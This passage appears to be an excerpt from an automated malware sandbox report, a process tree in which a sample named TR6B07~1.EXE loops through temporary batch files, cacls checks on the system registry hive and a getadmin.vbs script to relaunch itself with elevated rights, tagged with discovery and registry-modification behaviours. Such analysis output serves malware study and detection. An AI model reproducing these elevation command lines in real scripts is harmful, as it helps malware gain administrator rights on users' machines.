C:\Windows\SysWOW64\cmd.execmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4PDLT8G1.bat" "C:\Users\Admin\Desktop\00369\TR6B07~1.EXE" "116⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:6576 -
C:\Windows\SysWOW64\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"117⤵PID:8596
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\getadmin.vbs"117⤵PID:6560
-
C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"118⤵PID:7324
-
C:\Windows\SysWOW64\cmd.execmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\C2SFNCVN.bat" "C:\Users\Admin\Desktop\00369\TR6B07~1.EXE" "119⤵
- Checks computer location settings
PID:10236 -
C:\Windows\SysWOW64\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"120⤵
- System Location Discovery: System Language Discovery
PID:7080
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\getadmin.vbs"120⤵
- Checks computer location settings
PID:3636 -
C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"C:\Users\Admin\Desktop\00369\TR6B07~1.EXE"121⤵PID:8508
-
C:\Windows\SysWOW64\cmd.execmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CW8JNJQB.bat" "C:\Users\Admin\Desktop\00369\TR6B07~1.EXE" "122⤵PID:3028
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-